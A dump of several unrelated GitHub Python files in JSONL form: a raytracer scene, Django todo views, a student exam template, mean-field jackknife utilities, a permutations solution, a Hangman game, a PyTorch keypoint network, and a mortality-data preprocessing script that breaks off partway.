EscritorioMAt, 'box' ) )\r\n\r\n # 
util\r\n r.scene.append( AABB(V3(-5.75, -1.75, -10), V3(1.5, 3.5, 1.25) , GoldLampMaterial, 'box' ) )\r\n r.scene.append( AABB(V3(-5.75, -1, -10), V3(2.75, 1.25, 1.25) , GoldLampMaterial, 'box' ) )\r\n r.scene.append( AABB(V3(-5, -1.2, -10), V3(1, 0.2, 1) , GoldLampMaterial, 'lamp' ) )\r\n \r\n # Ball\r\n r.scene.append( Sphere(V3( 0, 3.75, -10), 1, DiscoBall))\r\n\r\n #speakers\r\n r.scene.append( AABB(V3(3, -2, -10), V3(1, 0.85, 1.5) , speakers, 'box' ) )\r\n r.scene.append( AABB(V3(4, -2, -10), V3(1, 0.85, 1.5) , speakers, 'box' ) )\r\n r.scene.append( AABB(V3(3, -1.5, -10), V3(1, 0.85, 1.5) , speakers, 'box' ) )\r\n r.scene.append( AABB(V3(4, -1.5, -10), V3(1, 0.85, 1.5) , speakers, 'box' ) )\r\n \r\n # Room\r\n r.scene.append( AABB(V3(0,0,-12), V3(15,10,10), MaterialPared, 'room') )\r\n r.scene.append( AABB(V3(-5.58,0,-17), V3(3.75,10,0.2), MaterialPared, 'box') )\r\n r.scene.append( AABB(V3(5.58,0,-17), V3(3.75,10,0.2), MaterialPared, 'box') )\r\n r.scene.append( AABB(V3(0,-3.5,-17), V3(7.30,3,0.2), MaterialPared, 'box') )\r\n r.scene.append( AABB(V3(0,1.5,-17), V3(7.30,7,0.2), glass, 'box') ) # Window\r\n\r\n r.rtRender()\r\n\r\n r.glFinish('out.bmp')","repo_name":"AndresQuinto5/Proyecto-2-Raytracer","sub_path":"Raytracer.py","file_name":"Raytracer.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"22255164017","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.db.models import Q\nfrom susanowo.models.ttodo import TTodo\nfrom susanowo.forms.loginModelForm import MUserModelForm\nfrom omoikane.models import MUser\nimport datetime\n\n# Create your views here.\ndef login(request):\n if request.method == 'GET':\n user_id = request.session.get('LOGIN_USER_ID')\n form = MUserModelForm(request.GET or None)\n context = {\n 'form': form\n }\n\n if user_id:\n return redirect('/susanowo/index')\n\n return render(request, 'susanowo/login.html', context)\n else:\n form = MUserModelForm(request.POST)\n if not form.is_valid():\n context = {\n 'form': form\n }\n return render(request, 'susanowo/login.html', context)\n return redirect('/susanowo/index')\n\ndef requestLogin(request):\n\n return HttpResponse('Hello susanowo')\n\ndef index(request):\n d = {\n 'today': datetime.datetime.today().strftime(\"%Y/%m/%d\"),\n 'ttodos': TTodo.objects.filter(~Q(category='07') & ~Q(category='08')).order_by('deleted','category','delivery_date'),\n }\n\n return render(request, 'susanowo/index.html', d)\n\ndef modstatus(request):\n if request.method == 'POST':\n id = request.POST.get('param_id')\n complete = request.POST.get('param_complete')\n delete = request.POST.get('param_delete')\n\n t_todo = TTodo.objects.get(id=id)\n t_todo.completed = complete\n t_todo.deleted = delete\n t_todo.save()\n\n return HttpResponse(t_todo)\n","repo_name":"Ryuk-Togo/amenotorifune","sub_path":"susanowo/views/indexviews.py","file_name":"indexviews.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"15114171567","text":"EXAM_ID = '' # Enter the ID number given when you registered for the exam\nEMAIL = '' # Enter your contact email address\n\n\n\"\"\"***************\n *** TASK A1 ***\n ***************\"\"\"\n\n\ndef calculator_int():\n \"\"\"Modify calculator.py so that it has a function\n which removes decimals.\n Leave this method as is.\"\"\"\n\n import calculator as c\n\n r1 
= c.run('int(2.8)') # Expected value: 2\n    r2 = c.run('int(-4.69)') # Expected value: -4\n    r3 = c.run('int(-.9)') # Expected value: 0\n\n    return r1, r2, r3\n\n\n\"\"\"***************\n *** TASK A2 ***\n ***************\"\"\"\n\n\ndef calculator_factor():\n    \"\"\"Modify calculator.py so that it can handle\n    factorials.\n    Leave this method as is.\"\"\"\n\n    import calculator as c\n\n    r1 = c.run('0!') # Expected value: 1\n    r2 = c.run('1!') # Expected value: 1\n    r3 = c.run('2!') # Expected value: 2.0\n    r4 = c.run('3!') # Expected value: 6.0\n    r5 = c.run('exp(3!) + 2!') # Expected value: 405.4287934927351\n    r6 = c.run('2.5!') # Expected value: Error: Illegal argument to factorial: 2.5\n    r7 = c.run('-1!') # Expected value: -1\n    r8 = c.run('(-1)!') # Expected value: Error: Illegal argument to factorial: -1.0\n\n    return r1, r2, r3, r4, r5, r6, r7, r8\n\n\n\"\"\"***************\n *** TASK A3 ***\n ***************\"\"\"\n\n\ndef qlist_enqueue():\n    \"\"\"Modify Qlist.py so that a value can be queued.\n    Leave this method as is.\"\"\"\n\n    from Qlist import Queue\n\n    q = Queue()\n\n    for x in [6, 4, 6, 9, 4]:\n        q.enqueue(x)\n\n    return q\n\n\n\"\"\"***************\n *** TASK A4 ***\n ***************\"\"\"\n\n\ndef qlist_dequeue():\n    \"\"\"Modify Qlist.py so that a value can be\n    removed and returned.\n    Leave this method as is.\"\"\"\n\n    from Qlist import Queue\n\n    q = Queue()\n    l = [2, 8, 2, 7, 8, 4, 9, 2]\n    r = []\n\n    for x in l:\n        q.enqueue(x)\n\n    for _ in range(int(len(l) / 2)):\n        r.append(q.dequeue())\n\n    return r\n\n\n\"\"\"***************\n *** TASK A5 ***\n ***************\"\"\"\n\n\ndef operator_overload():\n    \"\"\"Modify Qlist.py so that two queues can\n    be added using the + sign to create\n    a third queue.\n    Leave this method as is.\"\"\"\n\n    from Qlist import Queue\n\n    q1 = Queue()\n    q2 = Queue()\n\n    for x in [5, 23, 2, 31]:\n        q1.enqueue(x)\n\n    for x in [9, 5, 56, 7]:\n        q2.enqueue(x)\n\n    try:\n        q3 = q1 + q2\n    except TypeError:\n        q3 = None\n\n    return q3\n\n\n\"\"\"***************\n *** TASK A6 ***\n ***************\"\"\"\n\n\ndef smallest_in_list():\n    \"\"\"Modify PQlist.py so that the smallest\n    item in the list is returned.\n    Leave this method as is.\"\"\"\n\n    from PQlist import PQlist\n\n    pq = PQlist()\n    for x in [2, 5, 3, 7, 2, 3]:\n        pq.enqueue(x)\n\n    return pq.smallest()\n\n\n\"\"\"***************\n *** TASK A7 ***\n ***************\"\"\"\n\n\ndef copy_list():\n    \"\"\"Modify PQlist.py so that it can\n    produce a copy of itself.\n    Leave this method as is.\"\"\"\n\n    from PQlist import PQlist\n\n    pq = PQlist()\n    for x in [5, 9, 3, 8, 5, 7]:\n        pq.enqueue(x)\n\n    return pq.copy()\n\n\n\"\"\"***************\n *** TASK A8 ***\n ***************\"\"\"\n\n\ndef pqlist_complexity_answer():\n    \"\"\"Write your answer to the question in Task A8 in\n    the string being returned.\"\"\"\n\n    return ''\n\n\n\"\"\"***************\n *** TASK A9 ***\n ***************\"\"\"\n\n\ndef pqbst_enqueue():\n    \"\"\"Modify PQbst.py so that a value can be queued.\n    Leave this method as is.\"\"\"\n\n    from PQbst import PQbst\n\n    pq = PQbst()\n    l = [4, 8, 4, 10, 7, 4, 8, 1]\n\n    for x in l:\n        pq.enqueue(x)\n\n    return pq\n\n\n\"\"\"****************\n *** TASK A10 ***\n ****************\"\"\"\n\n\ndef fib(n):\n    \"\"\"Feel free to modify this method\n    if you find it necessary in order\n    to complete this task.\"\"\"\n\n    if n <= 1:\n        return n\n    else:\n        return fib(n - 1) + fib(n - 2)\n\n\ndef multi_fib(fr=30, to=38):\n    \"\"\"Run parallel calls to the fib method\n    and return a dictionary object.\"\"\"\n\n    pass # Remove the pass statement and enter your code here
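\n\n\n# NOTE (editor's addition, an illustrative sketch -- not the author's solution): one way\n# to run fib in parallel with multiprocessing.Pool and collect an {n: fib(n)} dictionary,\n# reusing the fib() helper defined above.\ndef _sketch_multi_fib(fr=30, to=38):\n    from multiprocessing import Pool\n    ns = list(range(fr, to + 1))\n    with Pool() as pool:\n        return dict(zip(ns, pool.map(fib, ns)))\n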
\n\n\"\"\"***************\n *** TASK B1 ***\n ***************\"\"\"\n\n\ndef print_pq():\n    \"\"\"Make the method run correctly\"\"\"\n\n    from PQlist import PQlist\n\n    pq = PQlist()\n\n    for x in [2, 5, 3, 7, 2, 3]:\n        pq.enqueue(x)\n\n    result = ''\n\n    try:\n        for x in pq:\n            result += f'{x} '\n    except TypeError:\n        result = None\n\n    return result\n\n\n\"\"\"***************\n *** TASK B2 ***\n ***************\"\"\"\n\n\ndef letter_combo(s, l1, l2):\n    \"\"\"Recursively calculate and return\n    the number of times l1 directly\n    precedes l2 in the given string\"\"\"\n\n    pass # Remove the pass statement and enter your code here\n\n\n\"\"\"***************\n *** TASK B3 ***\n ***************\"\"\"\n\n\ndef pqbst_dequeue():\n    \"\"\"Modify PQbst.py so that a value can be dequeued.\n    Leave this method as is.\"\"\"\n\n    from PQbst import PQbst\n\n    pq = PQbst()\n    l = [6, 7, 12, 6, 1, 18, 9, 6, 5]\n    for x in l:\n        pq.enqueue(x)\n\n    x = 1\n    while x <= 5:\n        pq.dequeue()\n        x += 1\n\n    return pq\n\n\n\"\"\"***************\n *** TASK B4 ***\n ***************\"\"\"\n\n\ndef pqbst_complexity_answer():\n    \"\"\"Write your answer to the question in Task B4 in\n    the string being returned.\"\"\"\n\n    return ''\n\n\n\"\"\"***************\n *** TASK B5 ***\n ***************\"\"\"\n\n\ndef get_info(index):\n    \"\"\"This method opens the peeps.json file and returns\n    the about info of the customer of the index given.\n    Leave this method as is.\"\"\"\n\n    import json\n\n    with open('peeps.json') as f:\n        data = json.load(f)\n        return data[index]['about']\n\n\ndef worker(data):\n    \"\"\"Employ this worker in your parallel\n    execution if you need to, but do not add\n    input arguments to this method.\"\"\"\n\n    pass # Remove the pass statement and enter your code here\n\n\ndef calculate_occurrences(indexes, l1, l2):\n    \"\"\"Run each index concurrently.\n    Return a total of occurrences\n    found in the given customer's\n    about info from get_info.\"\"\"\n\n    pass # Remove the pass statement and enter your code here\n\n\n\"\"\"************************************\n *** Run and test your code below ***\n ************************************\"\"\"\n\n# Please note: The tests below are not exhaustive, meaning they do not cover all possible test cases.\n# Make sure you write your own cases as well to fully test your code.\n\n\nif __name__ == '__main__':\n    # ** TASK A1 **\n    print(f'A1: Executing int method in calculator. Expected value: (2, -4, 0).')\n    print(f\"Returned value: {calculator_int()} \\n\")\n    # **************\n\n    # ** TASK A2 **\n    print(f\"A2: Executing factorial method in calculator. \"\n          f\"Expected value: (1, 1, 2.0, 6.0, 405.4287934927351, 'Error', -1, 'Error') .\")\n    print(f\"Returned value: {calculator_factor()} \\n\")\n    # **************\n\n    # ** TASK A3 **\n    print(f'A3: Executing enqueue of Qlist. Expected value: [6, 4, 6, 9, 4].')\n    print(f\"Returned value: {qlist_enqueue()} \\n\")\n    # **************\n\n    # ** TASK A4 **\n    print(f'A4: Executing dequeue of Qlist. Expected value: [2, 8, 2, 7].')\n    print(f\"Returned value: {qlist_dequeue()} \\n\")\n    # **************\n\n    # ** TASK A5 **\n    print(f'A5: Executing + operator on Qlist. Expected value: [5, 23, 2, 31, 9, 5, 56, 7].')\n    print(f\"Returned value: {operator_overload()} \\n\")\n    # **************\n\n    # ** TASK A6 **\n    print(f'A6: Executing smallest of PQlist. Expected value: 2.')\n    print(f\"Returned value: {smallest_in_list()} \\n\")\n    # **************\n\n    # ** TASK A7 **\n    print(f'A7: Executing copy of PQlist. 
Expected value: [7, 5, 8, 3, 9, 5].')\n    print(f\"Returned value: {copy_list()} \\n\")\n    # **************\n\n    # ** TASK A8 **\n    print(f'A8: Executing pqlist_complexity_answer.')\n    print(f'Your answer to A8: {pqlist_complexity_answer()} \\n')\n    # **************\n\n    # ** TASK A9 **\n    print(f'A9: Executing enqueue of PQbst. Expected value: < 1 4 4 4 7 8 8 10 >.')\n    print(f\"Returned value: {pqbst_enqueue()} \\n\")\n    # **************\n\n    # ** TASK A10 **\n    # The method takes two integers and uses them as an\n    # interval to calculate Fibonacci numbers. It should return a dictionary\n    # with n as key and the nth Fibonacci number as value.\n    print('A10: Executing multi_fib. Expected value: '\n          '{'\n          '30: 832040,'\n          '31: 1346269, '\n          '32: 2178309, '\n          '33: 3524578, '\n          '34: 5702887, '\n          '35: 9227465, '\n          '36: 14930352, '\n          '37: 24157817, '\n          '38: 39088169'\n          '}.')\n    print(\"\\033[31m -- Uncomment the next line to test this method (can be slow!) -- \\033[0m \\n\")\n    #print(f\"Returned value: {multi_fib()} \\n\")\n    # **************\n\n    # ** TASK B1 **\n    print(f'B1: Executing print_pq. Expected value: 3 2 7 3 5 2 .')\n    print(f\"Returned value: {print_pq()} \\n\")\n    # **************\n\n    # ** TASK B2 **\n    quote = \"It’s hardware that makes a machine fast. It’s software that makes a fast machine slow.\"\n\n    # The method letter_combo takes a string and two letters as arguments\n    # and returns the number of occurrences where letter 1 directly precedes letter 2.\n    print(f'B2: Executing letter_combo. Expected value: 4.')\n    print(f\"Returned value: {letter_combo(quote, 'm', 'a')} \\n\")\n    # **************\n\n    # ** TASK B3 **\n    print(f'B3: Executing dequeue of PQbst. Expected value: < 7 9 12 18 > .')\n    print(f\"Returned value: {pqbst_dequeue()} \\n\")\n    # **************\n\n    # ** TASK B4 **\n    print(f'B4: Executing pqbst_complexity_answer.')\n    print(f'Your answer to B4: {pqbst_complexity_answer()} \\n')\n    # **************\n\n    # ** TASK B5 **\n    customer_indexes = [12, 19, 27, 48, 51, 66, 68, 80, 91, 101]\n\n    # The method calculate_occurrences takes a list of customer indexes\n    # along with two letters as input arguments. It should return the\n    # total of occurrences where letter 1 precedes letter 2 in the customer about info.\n    print(f'B5: Executing calculate_occurrences. Expected value: 27.')\n    print(f\"Returned value: {calculate_occurrences(customer_indexes, 'n', 'i')} \\n\")\n    # **************\n","repo_name":"HampusFors18/PythonProggII","sub_path":"exam20201217/answers.py","file_name":"answers.py","file_ext":"py","file_size_in_byte":10174,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"13854786284","text":"import torch\nimport numpy as np\n\ndef mfij_predict(args,\n                 loaders,\n                 dimensions,\n                 num_train=45000,\n                 block_size=1000):\n    '''\n    Compute mean-field infinitesimal jackknife predictions\n    :param args: hyper-parameters\n    :param loaders: a dictionary with key as the dataset name, and value as a dictionary.\n        The value dictionary contains 2 entries. 
One key 'features' has value of penultimate layer features,\n and another key 'logits_mean' has value of logits as in standard softmax.\n For example, loaders={'heldout': {'features': pen_features_heldout, 'logits_mean': logits_heldout},\n 'test': {'features': pen_features_test, 'logits_mean': logits_test}}.\n :param dimensions: [softmax_input_dim, softmax_output_dim]\n :param num_train: number of training samples\n :param block_size: batch size for parallelization\n :return:\n a dictionary with keys the same as loaders keys, and values of mfij predictions.\n '''\n hatc = eval(args.lambda0)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n # apply temp_ens\n U_cov = (args.cov / (args.temp_ens * num_train)).to(device)\n\n U_cov_4d = torch.reshape(U_cov, [dimensions[1], dimensions[0]+1,\n dimensions[1], dimensions[0]+1]).permute([0, 2, 1, 3])\n probs_mfij = dict()\n for data_key, per_sample_preacts in loaders.items():\n logits_mean = per_sample_preacts['logits_mean'].to(device)\n dimN, dimD = logits_mean.shape\n logits_cov = torch.zeros((dimN, dimD, dimD))\n for s_idx in range(0, dimN, block_size):\n logits_cov[s_idx:s_idx+block_size] = torch.einsum('nk,ijkl,nl->nij',\n per_sample_preacts['features'][s_idx:s_idx+block_size].to(device),\n U_cov_4d.to(device),\n per_sample_preacts['features'][s_idx:s_idx+block_size].to(device)).cpu().detach()\n logits_cov = logits_cov.to(device)\n probs_mfij[data_key] = batch_mf(args, logits_mean, logits_cov, hatc)\n return probs_mfij\n\ndef mfij_predict_kron_approx(args,\n loaders,\n block_size=1000):\n hatc = eval(args.lambda0)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n probs_mfij = dict()\n for data_key, per_sample_moments in loaders.items():\n dimN = per_sample_moments['logits_mean'].shape[0]\n print('num of data samples in', data_key, dimN)\n probs_mfij[data_key] = np.zeros((dimN, args.num_classes))\n logits_mat = per_sample_moments['logits_cov_mat'].to(device)\n for s_idx in range(0, dimN, block_size):\n logits_mean = per_sample_moments['logits_mean'][s_idx:s_idx + block_size].to(device)\n logits_scale = per_sample_moments['logits_cov_scale'][s_idx:s_idx + block_size].to(device)\n logits_cov = torch.einsum('n,ij->nij',\n logits_scale / args.temp_ens, # apply temp_ens\n logits_mat)\n probs_mfij[data_key][s_idx:s_idx + block_size] = batch_mf(args,\n logits_mean,\n logits_cov,\n hatc)\n return probs_mfij\n\ndef batch_mf(args,\n logits_mean,\n logits_cov,\n hatc):\n # apply temp_act\n if args.temp_act > 0:\n logits_mean /= args.temp_act\n # N x num_classes x num_classes\n logits_cov /= (args.temp_act ** 2)\n # N x num_classes x num_classes\n mukj = logits_mean.unsqueeze(2) - logits_mean.unsqueeze(1)\n if args.mf_approx == 'mf0':\n skj = torch.sqrt(1 + hatc * torch.diagonal(logits_cov, dim1=-2, dim2=-1)).unsqueeze(2)\n elif args.mf_approx == 'mf1':\n sigmak = torch.diagonal(logits_cov, dim1=-2, dim2=-1)\n sigmakj = sigmak.unsqueeze(2) + sigmak.unsqueeze(1)\n skj = torch.sqrt(1 + hatc * sigmakj)\n del sigmakj, sigmak\n elif args.mf_approx == 'mf2':\n sigmak = torch.diagonal(logits_cov, dim1=-2, dim2=-1)\n sigmakj = sigmak.unsqueeze(2) + sigmak.unsqueeze(1) - 2 * logits_cov\n skj = torch.sqrt(1 + hatc * sigmakj)\n del sigmakj, sigmak\n del logits_cov\n probs_unormalized = 1. 
/ torch.sum(torch.exp(- mukj / skj), dim=-1)\n    if args.temp_act > 0:\n        # normalize\n        probs = probs_unormalized / torch.sum(probs_unormalized, dim=1, keepdim=True)\n    elif args.temp_act == 0:\n        # do not normalize when args.temp_act == 0\n        probs = probs_unormalized\n    return probs.cpu().detach().numpy().astype(np.float64)","repo_name":"Sha-Lab/mean-field-infinitesimal-jackknife","sub_path":"Utils/mfij_utils.py","file_name":"mfij_utils.py","file_ext":"py","file_size_in_byte":5050,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"73496561647","text":"class Solution:\n    def permute(self, nums: List[int]) -> List[List[int]]:\n        ans = []\n        \n        def backtrack(bit, res):\n            \n            if len(res) == len(nums):\n                ans.append(res.copy())\n                return\n            \n            for index in range(len(nums)):\n                if bit & (1 << index) == 0:\n                    res.append(nums[index])\n                    backtrack(bit | (1 << index), res)\n                    res.pop()\n            \n            return ans\n        \n        return backtrack(0,[])","repo_name":"cypghost/A2SV","sub_path":"0046-permutations/0046-permutations.py","file_name":"0046-permutations.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"35931304157","text":"# Hangman Game\n#\n# The classic game of Hangman. The computer picks a random word\n# and the player tries to guess it, one letter at a time. If the player\n# can't guess the word in time, the little stick figure gets hanged.\n\n# All credit to Michael Dawson, who presents this code in his book -> Python for Absolute Beginners\n\nimport random\n# constants\nHANGMAN = (\n    \"\"\"\n\t\t------\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t----------\n\"\"\",\n    \"\"\"\n\t\t------\n\t\t| |\n\t\t| O\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t----------\n\"\"\",\n    \"\"\"\n\t\t------\n\t\t| |\n\t\t| O\n\t\t| -+-\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t----------\n\"\"\",\n    \"\"\"\n\t\t------\n\t\t| |\n\t\t| O\n\t\t| /-+-\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t----------\n\"\"\",\n    \"\"\"\n\t\t------\n\t\t| |\n\t\t| O\n\t\t| /-+-/\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t----------\n\"\"\",\n    \"\"\"\n\t\t------\n\t\t| |\n\t\t| O\n\t\t| /-+-/\n\t\t| |\n\t\t|\n\t\t|\n\t\t|\n\t\t|\n\t\t----------\n\"\"\",\n    \"\"\"\n\t\t------\n\t\t| |\n\t\t| O\n\t\t| /-+-/\n\t\t| |\n\t\t| |\n\t\t| |\n\t\t| |\n\t\t|\n\t\t----------\n\"\"\",\n    \"\"\"\n\t\t------\n\t\t| |\n\t\t| O\n\t\t| /-+-/\n\t\t| |\n\t\t| |\n\t\t| | |\n\t\t| | |\n\t\t|\n\t\t----------\n\"\"\")\n\nMAX_WRONG = len(HANGMAN) - 1\n\n# feel free to change the words as per your needs\n\nWORDS = (\"CRYPTOGRAPHY\", \"WAVELENGTH\", \"CHAMPAGNE\", \"CONFIGURATION\", \"AMAZEMENT\")\n\nword = random.choice(WORDS)\n# the word to be guessed (using a random word from the above tuple)\n\nso_far = \"_\" * len(word)\n# one dash for each letter in word to be guessed (keeps track of current progress)\n\nwrong = 0\n# number of wrong guesses player has made\n\nused = []\n# letters already guessed\n\n# Main loop\nprint(\"\\n\tWelcome to Hangman. 
Good luck!\n\")\nwhile wrong < MAX_WRONG and so_far != word:\n    print(HANGMAN[wrong])\n    print(\"\\nYou've used the following letters:\\n\", used)\n    print(\"\\nSo far, the word is:\\n\\n\", so_far)\n\n    # Getting the player's guess\n    guess = input(\"\\n\\nEnter your guess: \")\n    guess = guess.upper()\n    while guess in used:\n        print(\"You've already guessed the letter\", guess)\n        guess = input(\"Enter your guess: \")\n        guess = guess.upper()\n    used.append(guess)\n\n    # Checking the Guess\n    if guess in word:\n        print(\"\\nYes!\", guess, \"is in the word!\")\n        # create a new so_far to include guess\n        new = \"\"\n        for i in range(len(word)):\n            if guess == word[i]:\n                new += guess\n            else:\n                new += so_far[i]\n        so_far = new\n    else:\n        print(\"\\nSorry,\", guess, \"isn't in the word.\")\n        wrong += 1\n\n# Ending the Game\nif wrong == MAX_WRONG:\n    print(HANGMAN[wrong])\n    print(\"\\nYou've been hanged!\")\nelse:\n    print(\"\\nYou guessed it!\")\nprint(\"\\nThe word was\", word)\ninput(\"\\n\\nPress the enter key to exit.\")\n","repo_name":"sumana2001/Pybull","sub_path":"Hangman-Game/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"2"} +{"seq_id":"38431051134","text":"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass ResBlockMobile(torch.nn.Module):\n    \"\"\"ResBlockMobile: define a convolutional block with a residual shortcut.\n    It is the caller's duty to ensure the same size of input and output.\n    \"\"\"\n    def __init__(self, in_channels, out_channels, kernel_size, stride=1,\n                 padding=0, dilation=1, groups_d=1, groups_c=1, groups_r=1,\n                 padding_mode='zeros'):\n        super(ResBlockMobile, self).__init__()\n        self.convb = nn.Sequential(\n            nn.BatchNorm2d(in_channels, affine=True),\n            nn.ReLU(),\n            nn.Conv2d(\n                in_channels, out_channels, kernel_size=kernel_size,\n                stride=stride, padding=padding, dilation=dilation,\n                groups=groups_d, bias=False, padding_mode=padding_mode),\n            nn.Conv2d(\n                out_channels, out_channels, kernel_size=1,\n                stride=1, padding=0, dilation=1,\n                groups=groups_c, bias=True),\n        )\n        self.conv_residual = None\n        if stride != 1 or in_channels != out_channels:\n            self.conv_residual = nn.Conv2d(\n                in_channels, out_channels, kernel_size=1,\n                stride=stride, padding=0, groups=groups_r, bias=False)\n        return\n\n    def forward(self, input):\n        if self.conv_residual is not None:\n            residual = self.conv_residual(input)\n        else:\n            residual = input\n        out = self.convb(input)\n        out += residual\n        return out\n
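\n# NOTE (editor's addition, an illustrative usage sketch -- not from the original repo):\n# a ResBlockMobile with stride 2 halves the spatial size while the 1x1 conv_residual\n# branch matches the channel count and stride, e.g.:\n#   block = ResBlockMobile(32, 64, kernel_size=3, stride=2, padding=1)\n#   out = block(torch.randn(1, 32, 64, 64))  # expected shape: (1, 64, 32, 32)\n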
\nclass SEKDMobile(torch.nn.Module):\n    \"\"\"SEKDMobile model definition, simultaneously detect and describe keypoints.\n    \"\"\"\n    def __init__(self):\n        super(SEKDMobile, self).__init__()\n        self.conv0 = nn.Conv2d(1, 32, kernel_size=3, padding=1, bias=True)\n        self.resblock0 = nn.Sequential(\n            ResBlockMobile(32, 32, kernel_size=3, padding=1,\n                groups_d=32, groups_c=8),\n            ResBlockMobile(32, 32, kernel_size=3, padding=1,\n                groups_d=32, groups_c=8),\n            ResBlockMobile(32, 32, kernel_size=3, padding=1,\n                groups_d=32, groups_c=1),\n        )\n\n        self.resblock1 = nn.Sequential(\n            ResBlockMobile(32, 64, kernel_size=3, stride=2, padding=1,\n                groups_d=32, groups_c=16, groups_r=8),\n            ResBlockMobile(64, 64, kernel_size=3, padding=1,\n                groups_d=64, groups_c=16),\n            ResBlockMobile(64, 64, kernel_size=3, padding=1,\n                groups_d=64, groups_c=1),\n        )\n\n        self.resblock2 = nn.Sequential(\n            ResBlockMobile(64, 128, kernel_size=3, stride=2, padding=1,\n                groups_d=64, groups_c=32, groups_r=16),\n            ResBlockMobile(128, 128, kernel_size=3, padding=1,\n                groups_d=128, groups_c=32),\n            ResBlockMobile(128, 128, kernel_size=3, padding=1,\n                groups_d=128, groups_c=1),\n        )\n\n        self.deconv0 = nn.Sequential(\n            nn.BatchNorm2d(128, affine=True),\n            nn.ReLU(),\n            nn.ConvTranspose2d(128, 64, kernel_size=3, stride=2, padding=1,\n                groups=64, output_padding=1, bias=True),\n        )\n\n        self.deconv1 = nn.Sequential(\n            nn.BatchNorm2d(64, affine=True),\n            nn.ReLU(),\n            nn.ConvTranspose2d(64, 32, kernel_size=3, stride=2, padding=1,\n                groups=32, output_padding=1, bias=True),\n        )\n\n        self.detector = nn.Conv2d(\n            32, 2, kernel_size=3, padding=1, groups=2, bias=True)\n\n        self.descriptor = ResBlockMobile(\n            128, 128, kernel_size=3, padding=1, groups_d=128, groups_c=32)\n\n        return\n\n    def forward(self, input):\n        feature0_ = self.resblock0(self.conv0(input))\n        feature1_ = self.resblock1(feature0_)\n        feature2 = self.resblock2(feature1_)\n\n        feature1 = feature1_ + self.deconv0(feature2)\n        feature0 = feature0_ + self.deconv1(feature1)\n\n        score = self.detector(feature0)\n        descriptor = self.descriptor(feature2)\n\n        return score, descriptor, feature0\n\n","repo_name":"aliyun/Self-Evolving-Keypoint-Demo","sub_path":"nets/sekd_mobile.py","file_name":"sekd_mobile.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"2"} +{"seq_id":"13266160396","text":"'''\nCreated on Nov 16, 2016\n\n@author: sarker\n'''\n\nimport os\nimport numpy as np\nimport DataIOFactory as dataIO\nimport csv\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import f1_score\nimport re\nimport Util as Util\nimport time\n\n\n'''\nColumn Names\nId ResidentStatus Education1989Revision Education2003Revision EducationReportingFlag MonthOfDeath Sex AgeType Age AgeSubstitutionFlag AgeRecode52 AgeRecode27 AgeRecode12 InfantAgeRecode22 PlaceOfDeathAndDecedentsStatus MaritalStatus DayOfWeekOfDeath CurrentDataYear InjuryAtWork MannerOfDeath MethodOfDisposition Autopsy ActivityCode PlaceOfInjury Icd10Code CauseRecode358 CauseRecode113 InfantCauseRecode130 CauseRecode39 NumberOfEntityAxisConditions NumberOfRecordAxisConditions Race BridgedRaceFlag RaceImputationFlag RaceRecode3 RaceRecode5 HispanicOrigin HispanicOriginRaceRecode\n''' \n\n'''\nThis method returns only those data samples which have a disease, 
as mentioned in https://en.wikipedia.org/wiki/ICD-10#List.\nThis method also writes the data samples into files.\n'''\ndef getOnlyDiseaseData(inputFileName, outputFileName):\n\n    dataMatrixWithLabel = dataIO.getDataMatrixFromCSV(inputFileName)\n    \n    '''ICD10Code = column 24'''\n    icd10Codes = dataMatrixWithLabel[:, 24]\n    \n    dataMatrixWithOnlyDieseases = [];\n    \n    '''pattern to match'''\n    pattern = re.compile('[A-R]+')\n    \n    counter = 0\n    \n    '''write to file''' \n    with open(outputFileName, 'w', newline='') as csvfile:\n        writer = csv.writer(csvfile, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n        for icd10Code in icd10Codes:\n            if(re.match(pattern, icd10Code)):\n                dataMatrixWithOnlyDieseases.append(dataMatrixWithLabel[counter])\n                writer.writerow(dataMatrixWithLabel[counter])\n            counter += 1\n    \n    \n    dataMatrixWithOnlyDieseases = np.array(dataMatrixWithOnlyDieseases)\n    return dataMatrixWithOnlyDieseases \n\n\n'''This method maps string values to integer values'''\ndef changeStringToInteger(fileName, cols, hasColumnHeader):\n    print('################# changeStringToInteger() started ##################')\n    start_time = time.time()\n    dataMatrixWithLabel = dataIO.getDataMatrixFromCSV(fileName)\n    \n    '''remove the column_Header/label_of_the_column from the data'''\n    if(hasColumnHeader):\n        dataMatrix = dataMatrixWithLabel[1:]\n    \n    for i in cols:\n        \n        '''Column 6 = Sex: \n        F = 0\n        M = 1\n        '''\n        if(i == 6):\n            c6 = []\n            for rowData in dataMatrix[:, i]:\n                if(rowData == 'F'):\n                    c6.append(0)\n                else:\n                    c6.append(1)\n        \n        '''Column 15 = Marital Status\n        S = Never married, single = 